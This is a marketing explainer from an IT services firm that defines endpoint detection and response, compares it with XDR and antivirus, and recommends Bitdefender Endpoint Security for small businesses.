Endpoint detection and response (EDR) definition
What is an Endpoint
An endpoint is a computing device - computer, mobile, tablet - directly used by individuals to undertake tasks. It is a general term to differentiate from infrastructure devices such as servers.
What is an EDR?
Endpoint Detection and Response (EDR) is the modern cybersecurity solution that operates at endpoint level. It continuously monitors for and protects against a wide range of cyber attack methods on endpoints
What is an XDR?
EXtended Detection and Response (XDR) is a developing cybersecurity solution that operates centrally. It combines information from a range of inputs, including data from EDR agents, and provides a complete profile of threat status throughout an organisation.
What is the difference between EDR and XDR?
EDR is a comprehensive protection for an individual endpoint but is isolated to protecting that one endpoint. XDR combines many inputs to recognise and respond to co-ordinated attacks from multiple vectors.
Why is endpoint detection and response important?
Security is a primary concern for computer systems, keeping your data safe and your business protected against attack. As interconnectivity grows and digital solutions become the norm, attackers are becoming ever more focused on cyber as a vector to steal from their victims. As attacks become ever more sophisticated and harder to spot by victims, having a broad, robust defence is now more important than ever.
Endpoint detection and response benefits
EDR developed from previous generations of protections - like antivirus - to meet modern attack vectors. Crypto attack, phishing, living off the land are all mechanisms where antivirus will not prevent compromise because there is no virus involved. EDR gives confidence that the device behaviour is normal, that there is no suspicious activity, and that the business is secure across the board.
How does endpoint detection and response work?
Discover and control - identify abnormal behaviour by the computer
Detect and defuse in real time - apply tools to single-out the offending process and close it down
Automatic incident response - policies mean that the EDR is empowered to take action wherever and whenever
Instantly stop attacks- no delay waiting for response from a central team
Minimise business impact - instantly addressing a wide range of attacks means business operations are not disrupted by cyberthreats
Endpoint detection and response vs antivirus
Antivirus technology is a scanning technology that has a library of known virus 'fingerprints', watches for them, and locks them out if found. Modern attacks do not rely on viruses to breach a system, they are much more sophisticated. Many take advantage of the inability of a person to identify real from fake agencies. Therefore the security layer in an EDR works by identifying and halting suspicious behaviour based on a wide range of metrics.
How to implement EDR
EDR can be integrated with your computer operating system or installed as a third-party agent like any other piece of software. The command and control centre needs to be configured to correctly profile endpoints to be protected. The monitor component sometimes needs to be tuned to reduce the amount of excess 'chatter' and remove excess false positives, such that the monitoring team is only alerted in real emergency situations.
How to choose an EDR solution
There are several parameters that can be considered when choosing an EDR, but overriding any choice is the knowledge that a business will be much more secure with any reputable EDR solution than with none. Factors such as performance, endpoint resources and cost of ownership can be important; some solutions require in-depth knowledge by a 24-hour team to give their best. We have chosen to use Bitdefender Endpoint Security as our standard EDR, because it offers a high level of performance in a cost-effective package, offering good management and reporting capabilities.
Endpoint detection and response best practices
Assess the actual controls that can be implemented without preventing business operations. There's no point in a secure solution that completely halts all business.
EDR is one part of the defences, so don't assume that EDR alone will keep you secure. Consider and deploy other layers - such as patching [link to article] or user awareness [link to article].
Design the interconnectivity to minimise potential spread of an attack.
Audit and monitor the output from the EDR and ensure it is correctly deployed where needed.
Endpoint detection and response configuration
Some EDRs require a high degree of customisation to give their best, and these will provide the best performance with least disruption to a given organisation. However, they need detailed setup knowledge and then a dedicated team to ensure the reports generated are acted upon promptly, and so generally have a high cost of ownership. Some EDRs are designed to be low maintenance and largely autonomous, requiring a much lower investment of resources but with a compromise in either some other aspect of performance.
Cost of EDR
Total cost of ownership can vary widely. As in most areas of technology, every solution has its own range of strengths and benefits. This product is perfect for this sector, that product is better for that size of organisation. Some work better in a single site, others work better in a distributed workforce. Value to the organisation, the cost of ownership vs the potential cost of compromise, is the equation to consider.
Flex IT has selected Bitdefender Endpoint Security as a highly effective solution in the SME space, combining a high level of autonomy and performance with a low cost of ownership. We combine EDR with a range of other protection layers to ensure our clients are well protected in their daily operations.
Contact us today to find out more.